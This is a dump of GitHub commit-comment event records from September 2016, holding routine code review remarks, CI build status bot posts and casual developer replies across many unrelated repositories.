{"id":"4511216986","type":"CommitCommentEvent","actor":{"login":"sethten"},"repo":{"name":"sethten/ficbot"},"payload":{"comment":{"id":18887992,"position":35,"line":49,"path":"ficbot.js","commit_id":"d12b6e454a4d8148f12849f1c26695e7d45ed8aa","created_at":"2016-09-02T23:46:58Z","updated_at":"2016-09-02T23:46:58Z","body":"No need to escape the forward slash here or on lines 54 and 56 because the regex is being created via a string, not the `/pattern/` syntax"}},"created_at":"2016-09-02T23:46:58Z"}
{"id":"4511220193","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":18888000,"position":null,"line":null,"path":null,"commit_id":"ccaa23bd7e04d9bc051eecd8a66d8a4fbb5297a6","created_at":"2016-09-02T23:48:30Z","updated_at":"2016-09-02T23:48:30Z","body":"AddLoggingToInstaller (JasonGlazer) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug: OK (1759 of 1760 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-ccaa23bd7e04d9bc051eecd8a66d8a4fbb5297a6-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-ccaa23bd7e04d9bc051eecd8a66d8a4fbb5297a6-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.94%25-yellow.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-ccaa23bd7e04d9bc051eecd8a66d8a4fbb5297a6-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-70.9%25-green.svg)</a>\n"}},"created_at":"2016-09-02T23:48:30Z"}
{"id":"4511222995","type":"CommitCommentEvent","actor":{"login":"pablomatiasgomez"},"repo":{"name":"pablomatiasgomez/ejercicios-java"},"payload":{"comment":{"id":18888005,"position":33,"line":47,"path":"src/com/ejercicios/GroupFirstLetter.java","commit_id":"bae04dc17dffb1da64d85fc88b996a204db6e60b","created_at":"2016-09-02T23:49:50Z","updated_at":"2016-09-02T23:49:50Z","body":"No hace falta hacer el put siempre, solo en la creación ya que despues queda asignado por referencia, la lista es siempre la misma"}},"created_at":"2016-09-02T23:49:50Z"}
{"id":"4511223642","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":18888006,"position":null,"line":null,"path":null,"commit_id":"d62619d2a9812e7e3717cd93f2e2b1076dd2281f","created_at":"2016-09-02T23:50:06Z","updated_at":"2016-09-02T23:50:06Z","body":"develop (mjwitte) - x86_64-Linux-Ubuntu-14.04-gcc-4.8: OK (1778 of 1778 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-d62619d2a9812e7e3717cd93f2e2b1076dd2281f-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-d62619d2a9812e7e3717cd93f2e2b1076dd2281f-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.svg)</a> \n"}},"created_at":"2016-09-02T23:50:06Z"}
{"id":"4511226366","type":"CommitCommentEvent","actor":{"login":"bbondy"},"repo":{"name":"brave/browser-laptop"},"payload":{"comment":{"id":18888010,"position":null,"line":null,"path":null,"commit_id":"990e7a33853da114cf067dcdbf40180d6d045ee0","created_at":"2016-09-02T23:51:19Z","updated_at":"2016-09-02T23:51:19Z","body":"hah well I have that file too at that location (relative to ~/)"}},"created_at":"2016-09-02T23:51:19Z"}
{"id":"4511229795","type":"CommitCommentEvent","actor":{"login":"garris"},"repo":{"name":"garris/BackstopJS"},"payload":{"comment":{"id":18888015,"position":null,"line":null,"path":null,"commit_id":"2b25df5d8250f10fd74bc39b7555164f81a9cd35","created_at":"2016-09-02T23:52:56Z","updated_at":"2016-09-02T23:52:56Z","body":"@onigoetz  I found a bug where, in legacy mode, if you explicitly define an html_report location the report resources would get written to the wrong location.   I made the fix and committed it -- but I just wanted to run this by you and your team since it's a high-impact change."}},"created_at":"2016-09-02T23:52:56Z"}
{"id":"4511231425","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":18888019,"position":null,"line":null,"path":null,"commit_id":"d62619d2a9812e7e3717cd93f2e2b1076dd2281f","created_at":"2016-09-02T23:53:42Z","updated_at":"2016-09-02T23:53:42Z","body":"develop (mjwitte) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-d62619d2a9812e7e3717cd93f2e2b1076dd2281f-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a>  \n"}},"created_at":"2016-09-02T23:53:42Z"}
{"id":"4511232924","type":"CommitCommentEvent","actor":{"login":"magnumripper"},"repo":{"name":"magnumripper/JohnTheRipper"},"payload":{"comment":{"id":18888022,"position":8,"line":165,"path":"src/opencl/krb5pa-md5_kernel.cl","commit_id":"b755050c8a8f7777655d1a9d817400cadd407414","created_at":"2016-09-02T23:54:23Z","updated_at":"2016-09-02T23:54:23Z","body":"Why? If we were to credit \"inventors\" of every little trick we use in JtR with comments in the source, we'd need to add, literally, thousands of lines of comments. And the end users won't read them.\r\n\r\nLike you say I did credit Hashcat in the commit message. I guess Atom wrote that but can't be sure since every source line in that initial commit points to him."}},"created_at":"2016-09-02T23:54:23Z"}
{"id":"4511239721","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":18888035,"position":null,"line":null,"path":null,"commit_id":"79a12ca873918623db0c3cf60dad0340cffd8b70","created_at":"2016-09-02T23:57:38Z","updated_at":"2016-09-02T23:57:38Z","body":"#2520943-WindowsCalc-Engine_Integration (vidanovic) - x86_64-MacOS-10.9-clang: Build Failed\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-79a12ca873918623db0c3cf60dad0340cffd8b70-x86_64-MacOS-10.9-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-failing-red.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-79a12ca873918623db0c3cf60dad0340cffd8b70-x86_64-MacOS-10.9-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-51.27%25-red.svg)</a> \n"}},"created_at":"2016-09-02T23:57:38Z"}
{"id":"4511242071","type":"CommitCommentEvent","actor":{"login":"Extreme112"},"repo":{"name":"Extreme112/monopv1"},"payload":{"comment":{"id":18888040,"position":null,"line":null,"path":null,"commit_id":"7d68c40d0ca93f6144f1dd2c1188e164f370c37f","created_at":"2016-09-02T23:58:50Z","updated_at":"2016-09-02T23:58:50Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;FKJki3Kw&#x2F;16-popup-keyboard\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> Popup keyboard.</a>"}},"created_at":"2016-09-02T23:58:50Z"}
{"id":"4511243217","type":"CommitCommentEvent","actor":{"login":"olleharstedt"},"repo":{"name":"LimeSurvey/LimeSurvey"},"payload":{"comment":{"id":18888045,"position":null,"line":null,"path":null,"commit_id":"00004442774cce1e7d8ca337afd99c4e90a3fb48","created_at":"2016-09-02T23:59:27Z","updated_at":"2016-09-02T23:59:27Z","body":"Thank you. I'm trying to document $ia and other variables in the manual entry for question objects. Confusing work!"}},"created_at":"2016-09-02T23:59:27Z"}
{"id":"4506321444","type":"CommitCommentEvent","actor":{"login":"guestcenter-devops"},"repo":{"name":"opentable/gc-microsite-restaurant-search"},"payload":{"comment":{"id":18874538,"position":null,"line":null,"path":null,"commit_id":"834cc4d573b82acd4521eb54b251ade93916f55a","created_at":"2016-09-02T03:00:18Z","updated_at":"2016-09-02T03:00:18Z","body":"TeamCity Umami :: WebClient :: Sites :: Micro Sites :: GC Microsite - Restaurant Search :: Pull Request Test [Build 6](http://teamcity.otenv.com/viewLog.html?buildId=5155427&buildTypeId=Umami_WebClient_MicroSites_GcMicrositeRestaurantSearch_PullRequestTest) outcome was **FAILURE**\nSummary: Exit code 2 Build time: 00:00:51"}},"created_at":"2016-09-02T03:00:18Z"}
{"id":"4506323477","type":"CommitCommentEvent","actor":{"login":"alexey-milovidov"},"repo":{"name":"yandex/ClickHouse"},"payload":{"comment":{"id":18874541,"position":56,"line":30,"path":"dbms/include/DB/Common/ThreadPool.h","commit_id":"1bb6ccd7f88553a8f89aac3d8ca470b777107359","created_at":"2016-09-02T03:01:02Z","updated_at":"2016-09-02T03:01:02Z","body":"Спасибо! Это уже привело к проблеме.\r\nСмотри последний коммит - возможно, я ещё что-то забыл."}},"created_at":"2016-09-02T03:01:02Z"}
{"id":"4506325736","type":"CommitCommentEvent","actor":{"login":"Agarian"},"repo":{"name":"OgarProject/Ogar2-Server"},"payload":{"comment":{"id":18874546,"position":null,"line":null,"path":null,"commit_id":"242dece2b68b7e806eae5c3ab1818a5103563602","created_at":"2016-09-02T03:02:00Z","updated_at":"2016-09-02T03:02:00Z","body":"Sure seems like it."}},"created_at":"2016-09-02T03:02:00Z"}
{"id":"4506326768","type":"CommitCommentEvent","actor":{"login":"apmuthu"},"repo":{"name":"simpleinvoices/simpleinvoices"},"payload":{"comment":{"id":18874548,"position":null,"line":null,"path":null,"commit_id":"008a1b6829b2e8a01f3ef62a1a5c3db814d0bbd7","created_at":"2016-09-02T03:02:28Z","updated_at":"2016-09-02T03:02:28Z","body":"The reference to ````http://i.stack.imgur.com/MnyxU.gif```` at line 3441 in  ````extensions/matts_luxury_pack/templates/default/css/main.css```` can be localised by providing the image in the extension itself.\r\n![mnyxu](https://cloud.githubusercontent.com/assets/2995044/18191417/c5856424-70e7-11e6-92e7-ba2ee1502646.gif)\r\n\r\n"}},"created_at":"2016-09-02T03:02:28Z"}
{"id":"4506329751","type":"CommitCommentEvent","actor":{"login":"abuhelwa"},"repo":{"name":"abuhelwa/PKADVAN_Rpackage"},"payload":{"comment":{"id":18874554,"position":null,"line":null,"path":null,"commit_id":"2eb5e3fe80093e9657c0ffce66692dcce56b5e44","created_at":"2016-09-02T03:03:40Z","updated_at":"2016-09-02T03:03:40Z","body":"Hi Richard, \r\n\r\nI updated the master with various improvements. Probably update your branch from master next time when you work on it?\r\n\r\nThanks, Ahmad.\r\n"}},"created_at":"2016-09-02T03:03:40Z"}
{"id":"4506335266","type":"CommitCommentEvent","actor":{"login":"adanilo"},"repo":{"name":"w3c/html"},"payload":{"comment":{"id":18874567,"position":null,"line":null,"path":null,"commit_id":"f2e47c637f787169d881010591e0056f79e31c06","created_at":"2016-09-02T03:05:55Z","updated_at":"2016-09-02T03:05:55Z","body":"Fixed, verified my local build. Should be OK now."}},"created_at":"2016-09-02T03:05:55Z"}
{"id":"4506337041","type":"CommitCommentEvent","actor":{"login":"reduz"},"repo":{"name":"godotengine/godot"},"payload":{"comment":{"id":18874570,"position":null,"line":null,"path":null,"commit_id":"5b96c3a5527c1b2989dbfbe625f1c763b8887334","created_at":"2016-09-02T03:06:41Z","updated_at":"2016-09-02T03:06:41Z","body":"No.. too many keys to remember state, just use actions :P\n\nOn Sep 1, 2016 22:53, \"AngegaStudios\" <notifications@github.com> wrote:\n\n> Thanks for this.\n> Are there any plans to implement a is_key_just_pressed() function?\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/godotengine/godot/commit/5b96c3a5527c1b2989dbfbe625f1c763b8887334#commitcomment-18873555>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AF-Z2z1TojrFj7SAJQ5_ydbyCkEO52cJks5ql4GVgaJpZM4JzLeV>\n> .\n>\n"}},"created_at":"2016-09-02T03:06:41Z"}
{"id":"4506337706","type":"CommitCommentEvent","actor":{"login":"samme"},"repo":{"name":"samme/jaded-brunch"},"payload":{"comment":{"id":18874572,"position":null,"line":null,"path":null,"commit_id":"79b32288abd4675d6a927ac128ceacdc057d14a5","created_at":"2016-09-02T03:06:56Z","updated_at":"2016-09-02T03:06:56Z","body":"I think I changed this because I'd understood `plugins.jade` to be the preferred method. Both `plugins.jade` and `plugins.jade.jaded` have worked correctly though."}},"created_at":"2016-09-02T03:06:56Z"}
{"id":"4506345021","type":"CommitCommentEvent","actor":{"login":"scerdalian"},"repo":{"name":"jcadduono/idleKernel-note3"},"payload":{"comment":{"id":18874578,"position":null,"line":null,"path":null,"commit_id":"376481267592ae9668f4402c75a729fc5503c09f","created_at":"2016-09-02T03:10:00Z","updated_at":"2016-09-02T03:10:00Z","body":"i must go to the wrong place ,but i did not know where can i contact to you ,and i saw you answered here.so can i ask u a question? my phone model is sm-g9009d made in china,i can't find it in the twrp device tree(only have sm-g9009w,and i tried it ,failed),could u plz tell me how could i do?\r\n  sorry to bother u ,wait for your answer,thank u!"}},"created_at":"2016-09-02T03:10:00Z"}
{"id":"4506346442","type":"CommitCommentEvent","actor":{"login":"ylavoie"},"repo":{"name":"pjlsergeant/test-bdd-cucumber-perl"},"payload":{"comment":{"id":18874580,"position":null,"line":null,"path":null,"commit_id":"061d26609a75b87462a84ec87c83b870bc388bb9","created_at":"2016-09-02T03:10:35Z","updated_at":"2016-09-02T03:10:35Z","body":"It recognize the syntax: `prove --source Feature --feature-option 'tags=~@wip' -j 4 test.feature` but doesn't honour the bypass for the wip tag and tries to prove it."}},"created_at":"2016-09-02T03:10:35Z"}
{"id":"4506347252","type":"CommitCommentEvent","actor":{"login":"samwilson"},"repo":{"name":"solbisio/google-cloud-vision-php"},"payload":{"comment":{"id":18874581,"position":null,"line":null,"path":null,"commit_id":"233a4563abcf7d50b38516e080a6c72e75423f25","created_at":"2016-09-02T03:10:54Z","updated_at":"2016-09-02T03:10:54Z","body":"This doesn't `base64_encode` the content; is that an issue?\r\n\r\nWhat's the use case here? Because it seems that the same result could be achieved with `GoogleCloudVision::setImage($content, 'RAW')`.\r\n\r\n(I'm just investigating what people consider the flaws in this library.)"}},"created_at":"2016-09-02T03:10:54Z"}
{"id":"4506350483","type":"CommitCommentEvent","actor":{"login":"guestcenter-devops"},"repo":{"name":"opentable/gc-microsite-restaurant-search"},"payload":{"comment":{"id":18874592,"position":null,"line":null,"path":null,"commit_id":"b634852403eae65bcd4003bb19e744e04a014f96","created_at":"2016-09-02T03:12:13Z","updated_at":"2016-09-02T03:12:13Z","body":"TeamCity Umami :: WebClient :: Sites :: Micro Sites :: GC Microsite - Restaurant Search :: Pull Request Test [Build 7](http://teamcity.otenv.com/viewLog.html?buildId=5155463&buildTypeId=Umami_WebClient_MicroSites_GcMicrositeRestaurantSearch_PullRequestTest) is now running\n"}},"created_at":"2016-09-02T03:12:13Z"}
{"id":"4506352395","type":"CommitCommentEvent","actor":{"login":"guestcenter-devops"},"repo":{"name":"opentable/gc-microsite-restaurant-search"},"payload":{"comment":{"id":18874599,"position":null,"line":null,"path":null,"commit_id":"b634852403eae65bcd4003bb19e744e04a014f96","created_at":"2016-09-02T03:13:02Z","updated_at":"2016-09-02T03:13:02Z","body":"TeamCity Umami :: WebClient :: Sites :: Micro Sites :: GC Microsite - Restaurant Search :: Pull Request Test [Build 7](http://teamcity.otenv.com/viewLog.html?buildId=5155463&buildTypeId=Umami_WebClient_MicroSites_GcMicrositeRestaurantSearch_PullRequestTest) outcome was **FAILURE**\nSummary: Exit code 2 Build time: 00:00:48"}},"created_at":"2016-09-02T03:13:02Z"}
{"id":"4506355002","type":"CommitCommentEvent","actor":{"login":"elbote83"},"repo":{"name":"elbote83/elbote83.github.io"},"payload":{"comment":{"id":18874602,"position":null,"line":null,"path":null,"commit_id":"cd4fbf569ac8ff7250cbdd288d2ed605380be9f6","created_at":"2016-09-02T03:14:08Z","updated_at":"2016-09-02T03:14:08Z","body":"hola"}},"created_at":"2016-09-02T03:14:08Z"}
{"id":"4506361343","type":"CommitCommentEvent","actor":{"login":"blerner"},"repo":{"name":"brownplt/code.pyret.org"},"payload":{"comment":{"id":18874614,"position":null,"line":null,"path":null,"commit_id":"da01a1e026acb4a60d010a5a35fce77001cab86e","created_at":"2016-09-02T03:16:47Z","updated_at":"2016-09-02T03:16:47Z","body":"Yes, that definitely seems like a worthwhile thing to have."}},"created_at":"2016-09-02T03:16:47Z"}
{"id":"4506361844","type":"CommitCommentEvent","actor":{"login":"LucidCrux"},"repo":{"name":"eternaldensity/Sandcastle-Builder"},"payload":{"comment":{"id":18874616,"position":null,"line":null,"path":null,"commit_id":"b9425337d46916c9b973e7a79cafdb2553b3b5d9","created_at":"2016-09-02T03:16:59Z","updated_at":"2016-09-02T03:16:59Z","body":"Lol, I just saw this. Wow, that took a long time to get noticed. I have no idea how I managed it. :P\r\n\r\nI am amazed you are still keeping this going. That is some commitment right there. I commend you."}},"created_at":"2016-09-02T03:16:59Z"}
{"id":"4506367101","type":"CommitCommentEvent","actor":{"login":"NuSkooler"},"repo":{"name":"NuSkooler/enigma-bbs"},"payload":{"comment":{"id":18874621,"position":null,"line":null,"path":null,"commit_id":"e7ba6c406eaeffe75be1f6a8ff2b5f9e4fbd3cae","created_at":"2016-09-02T03:19:12Z","updated_at":"2016-09-02T03:19:12Z","body":"Damn. Looking into alternatives. xxHash is a good one, there are some binding versions and a pure JS if necessary. Will do some research."}},"created_at":"2016-09-02T03:19:12Z"}
{"id":"4506372808","type":"CommitCommentEvent","actor":{"login":"tanvil-optimus"},"repo":{"name":"radhab-optimus/DotNet"},"payload":{"comment":{"id":18874630,"position":5,"line":5,"path":"Assignment1/TestIf.cs","commit_id":"988fcafbbd74114eea9bb08dcc0fe3172334bb39","created_at":"2016-09-02T03:21:34Z","updated_at":"2016-09-02T03:21:34Z","body":"What is the default identifier of members at class level? Also look into if we can declare Main as private."}},"created_at":"2016-09-02T03:21:34Z"}
{"id":"4506373900","type":"CommitCommentEvent","actor":{"login":"tanvil-optimus"},"repo":{"name":"radhab-optimus/DotNet"},"payload":{"comment":{"id":18874631,"position":11,"line":11,"path":"Assignment2/TestSwitch.cs","commit_id":"3589fa9c88bf8247b3e1c8e39379ab38a137fc7d","created_at":"2016-09-02T03:22:04Z","updated_at":"2016-09-02T03:22:04Z","body":"Check indentation."}},"created_at":"2016-09-02T03:22:04Z"}
{"id":"4506376469","type":"CommitCommentEvent","actor":{"login":"tanvil-optimus"},"repo":{"name":"radhab-optimus/DotNet"},"payload":{"comment":{"id":18874633,"position":15,"line":15,"path":"Assignment3/TestEnum.cs","commit_id":"03f003ae4796373c17468365d876f3efde163a7d","created_at":"2016-09-02T03:23:14Z","updated_at":"2016-09-02T03:23:14Z","body":"Enums should be declared before class. Though it wont effect the code, but it is a coding convention. Refer to the microsoft document."}},"created_at":"2016-09-02T03:23:14Z"}
{"id":"4506377358","type":"CommitCommentEvent","actor":{"login":"B00mX0r"},"repo":{"name":"B00mX0r/kitsune"},"payload":{"comment":{"id":18874635,"position":null,"line":null,"path":null,"commit_id":"349e414ea86077a1b83f59b3658825c94efee320","created_at":"2016-09-02T03:23:37Z","updated_at":"2016-09-02T03:23:37Z","body":"ALSO PERFORMANCE IMPROVEMENTS KTHX"}},"created_at":"2016-09-02T03:23:37Z"}
{"id":"4506377627","type":"CommitCommentEvent","actor":{"login":"slycoder"},"repo":{"name":"slycoder/react-native-firestack"},"payload":{"comment":{"id":18874639,"position":null,"line":null,"path":null,"commit_id":"b098a60a18697c8d7f8440324aa2d01b2bd17f22","created_at":"2016-09-02T03:23:44Z","updated_at":"2016-09-02T03:23:44Z","body":"Cool, thanks for letting me know.  I saw that you started putting some stubs together --- I'll try to pitch in some time next week if I can."}},"created_at":"2016-09-02T03:23:44Z"}
{"id":"4506377962","type":"CommitCommentEvent","actor":{"login":"tanvil-optimus"},"repo":{"name":"radhab-optimus/DotNet"},"payload":{"comment":{"id":18874641,"position":8,"line":8,"path":"Assignment4/TestStrings.cs","commit_id":"6451455e794977cfdb3c5b05fdce578cabd0a1de","created_at":"2016-09-02T03:23:53Z","updated_at":"2016-09-02T03:23:53Z","body":"Should be FirstName."}},"created_at":"2016-09-02T03:23:53Z"}
{"id":"4506378986","type":"CommitCommentEvent","actor":{"login":"tanvil-optimus"},"repo":{"name":"radhab-optimus/DotNet"},"payload":{"comment":{"id":18874643,"position":46,"line":46,"path":"Assignment4/TestStrings.cs","commit_id":"6451455e794977cfdb3c5b05fdce578cabd0a1de","created_at":"2016-09-02T03:24:19Z","updated_at":"2016-09-02T03:24:19Z","body":"Mention what the function does."}},"created_at":"2016-09-02T03:24:19Z"}
{"id":"4506379505","type":"CommitCommentEvent","actor":{"login":"McSwaggens"},"repo":{"name":"owerosu/linux-csgo-external"},"payload":{"comment":{"id":18874644,"position":null,"line":null,"path":null,"commit_id":"eaa1b8d9c4380cfa668dbdaaf53a224c773a8917","created_at":"2016-09-02T03:24:31Z","updated_at":"2016-09-02T03:24:31Z","body":"I might work on a new log system, with some fancy colors and shit, the current log system is useless though either way..."}},"created_at":"2016-09-02T03:24:31Z"}
{"id":"4506379787","type":"CommitCommentEvent","actor":{"login":"tanvil-optimus"},"repo":{"name":"radhab-optimus/DotNet"},"payload":{"comment":{"id":18874646,"position":15,"line":15,"path":"Assignment5/TestStringArray.cs","commit_id":"6451455e794977cfdb3c5b05fdce578cabd0a1de","created_at":"2016-09-02T03:24:39Z","updated_at":"2016-09-02T03:24:39Z","body":"The strings can be added to array without indexing."}},"created_at":"2016-09-02T03:24:39Z"}
{"id":"4506382000","type":"CommitCommentEvent","actor":{"login":"tanvil-optimus"},"repo":{"name":"radhab-optimus/DotNet"},"payload":{"comment":{"id":18874661,"position":16,"line":16,"path":"Assignment8/Student.cs","commit_id":"4e3a6f7d759d69b1636a166d9f99633b6821d6a2","created_at":"2016-09-02T03:25:32Z","updated_at":"2016-09-02T03:25:32Z","body":"Look into difference between Parse, TryParse and Convert."}},"created_at":"2016-09-02T03:25:32Z"}
{"id":"4506382823","type":"CommitCommentEvent","actor":{"login":"tanvil-optimus"},"repo":{"name":"radhab-optimus/DotNet"},"payload":{"comment":{"id":18874664,"position":21,"line":21,"path":"Assignment8/Student.cs","commit_id":"4e3a6f7d759d69b1636a166d9f99633b6821d6a2","created_at":"2016-09-02T03:25:55Z","updated_at":"2016-09-02T03:25:55Z","body":"var can be used as var S1. Give proper names to objects."}},"created_at":"2016-09-02T03:25:55Z"}
{"id":"4506383950","type":"CommitCommentEvent","actor":{"login":"tanvil-optimus"},"repo":{"name":"radhab-optimus/DotNet"},"payload":{"comment":{"id":18874670,"position":54,"line":54,"path":"Assignment8/Student.cs","commit_id":"4e3a6f7d759d69b1636a166d9f99633b6821d6a2","created_at":"2016-09-02T03:26:25Z","updated_at":"2016-09-02T03:26:25Z","body":"Adjust text withing window frame. Scroll should be avoided."}},"created_at":"2016-09-02T03:26:25Z"}
{"id":"4506386965","type":"CommitCommentEvent","actor":{"login":"tanvil-optimus"},"repo":{"name":"radhab-optimus/DotNet"},"payload":{"comment":{"id":18874677,"position":7,"line":7,"path":"Assignment6/StudentManagementSystem.cs","commit_id":"9c685b0748940cffa6d3554526aa5a433ccf9995","created_at":"2016-09-02T03:27:43Z","updated_at":"2016-09-02T03:27:43Z","body":"mention access specifier explicitly."}},"created_at":"2016-09-02T03:27:43Z"}
{"id":"4506391489","type":"CommitCommentEvent","actor":{"login":"jcadduono"},"repo":{"name":"jcadduono/idleKernel-note3"},"payload":{"comment":{"id":18874680,"position":null,"line":null,"path":null,"commit_id":"376481267592ae9668f4402c75a729fc5503c09f","created_at":"2016-09-02T03:29:22Z","updated_at":"2016-09-02T03:29:22Z","body":"u can find me at #twrp on freenode irc (google freenode webchat)\r\nas for that...i dunno, i would have expected https://dl.twrp.me/kltechn/twrp-3.0.2-1-kltechn.img.tar.html to work, if it doesnt, may need to find proper dtb and chuck it in kltechn"}},"created_at":"2016-09-02T03:29:22Z"}
{"id":"4506392369","type":"CommitCommentEvent","actor":{"login":"truell20"},"repo":{"name":"HMProgrammingClub/NYCSL2"},"payload":{"comment":{"id":18874681,"position":null,"line":null,"path":null,"commit_id":"f5aa1918c21941e9dde34912a516309e9d7b6b37","created_at":"2016-09-02T03:29:44Z","updated_at":"2016-09-02T03:29:44Z","body":"Y"}},"created_at":"2016-09-02T03:29:44Z"}
{"id":"4506393460","type":"CommitCommentEvent","actor":{"login":"RichardUpton"},"repo":{"name":"abuhelwa/PKADVAN_Rpackage"},"payload":{"comment":{"id":18874682,"position":null,"line":null,"path":null,"commit_id":"2eb5e3fe80093e9657c0ffce66692dcce56b5e44","created_at":"2016-09-02T03:30:11Z","updated_at":"2016-09-02T03:30:11Z","body":"OK.\n\n\nOn 2/09/2016 12:33 PM, Ahmad Abuhelwa wrote:\n>\n> Hi Richard,\n>\n> I updated the master with various improvements. Probably update your \n> branch from master next time when you work on it?\n>\n> Thanks, Ahmad.\n>\n> —\n> You are receiving this because you commented.\n> Reply to this email directly, view it on GitHub \n> <https://github.com/abuhelwa/PKADVAN_Rpackage/commit/2eb5e3fe80093e9657c0ffce66692dcce56b5e44#commitcomment-18874554>, \n> or mute the thread \n> <https://github.com/notifications/unsubscribe-auth/ADiimYh9BCeqYKGL2kXKAe2YscEcGuZtks5ql5IMgaJpZM4Jfyz8>.Web \n> Bug from \n> https://github.com/notifications/beacon/ADiimTz_S0Cqe_rURsyExqF96Z2HK4hIks5ql5IMgaJpZM4Jfyz8.gif\n>\n> {\"api_version\":\"1.0\",\"publisher\":{\"api_key\":\"05dde50f1d1a384dd78767c55493e4bb\",\"name\":\"GitHub\"},\"entity\":{\"external_key\":\"github/abuhelwa/PKADVAN_Rpackage\",\"title\":\"abuhelwa/PKADVAN_Rpackage\",\"subtitle\":\"GitHub \n> repository\",\"main_image_url\":\"https://cloud.githubusercontent.com/assets/143418/17495839/a5054eac-5d88-11e6-95fc-7290892c7bb5.png\",\"avatar_image_url\":\"https://cloud.githubusercontent.com/assets/143418/15842166/7c72db34-2c0b-11e6-9aed-b52498112777.png\",\"action\":{\"name\":\"Open \n> in \n> GitHub\",\"url\":\"https://github.com/abuhelwa/PKADVAN_Rpackage\"}},\"updates\":{\"snippets\":[{\"icon\":\"PERSON\",\"message\":\"@abuhelwa \n> on 2eb5e3f: Hi Richard, \\r\\n\\r\\nI updated the master with various \n> improvements. Probably update your branch from master next time when \n> you work on it?\\r\\n\\r\\nThanks, Ahmad.\\r\\n\"}],\"action\":{\"name\":\"View \n> Commit\",\"url\":\"https://github.com/abuhelwa/PKADVAN_Rpackage/commit/2eb5e3fe80093e9657c0ffce66692dcce56b5e44#commitcomment-18874554\"}}}\n\n"}},"created_at":"2016-09-02T03:30:11Z"}
{"id":"4506398303","type":"CommitCommentEvent","actor":{"login":"cheeyixu"},"repo":{"name":"cheeyixu/PaillierExt"},"payload":{"comment":{"id":18874687,"position":null,"line":null,"path":null,"commit_id":"15d815199eedd4589e13dbc3d0525c87eddf1eb2","created_at":"2016-09-02T03:32:16Z","updated_at":"2016-09-02T03:32:16Z","body":"Added setData in BigInteger class. Could have also used setBit and setZero"}},"created_at":"2016-09-02T03:32:16Z"}
{"id":"4506398343","type":"CommitCommentEvent","actor":{"login":"kangkg"},"repo":{"name":"kangkg/kangkg.github.io"},"payload":{"comment":{"id":18874688,"position":null,"line":null,"path":null,"commit_id":"10f153f3d87928b2a2fdcd591a9890a39fc03633","created_at":"2016-09-02T03:32:16Z","updated_at":"2016-09-02T03:32:16Z","body":"Should have used a feature branch! Oops!"}},"created_at":"2016-09-02T03:32:16Z"}
{"id":"4506398385","type":"CommitCommentEvent","actor":{"login":"sc4ryb3ar"},"repo":{"name":"AOSPA/manifest"},"payload":{"comment":{"id":18874689,"position":null,"line":null,"path":null,"commit_id":"b019e50a5354f64b1b178354825cf173b4d36ee8","created_at":"2016-09-02T03:32:17Z","updated_at":"2016-09-02T03:32:17Z","body":"Whoa/ who thought of this? This is brilliant!"}},"created_at":"2016-09-02T03:32:17Z"}
{"id":"4506404872","type":"CommitCommentEvent","actor":{"login":"Aericio"},"repo":{"name":"ClearSkyTeam/ClearSky"},"payload":{"comment":{"id":18874691,"position":null,"line":null,"path":null,"commit_id":"0a08eee5711256319f9b72a4245f92b2f51af590","created_at":"2016-09-02T03:35:02Z","updated_at":"2016-09-02T03:35:02Z","body":"Then lets go make Nigot (spigot)\r\n(\"then lets go make\" as in \"then you go make\")"}},"created_at":"2016-09-02T03:35:02Z"}
{"id":"4506405813","type":"CommitCommentEvent","actor":{"login":"jsylman"},"repo":{"name":"jsylman/css_layout_exercises_starter_files"},"payload":{"comment":{"id":18874696,"position":null,"line":null,"path":null,"commit_id":"a9b11a595db2c31c2cf26cfb684299432b6c836b","created_at":"2016-09-02T03:35:27Z","updated_at":"2016-09-02T03:35:27Z","body":"updating to merge"}},"created_at":"2016-09-02T03:35:27Z"}
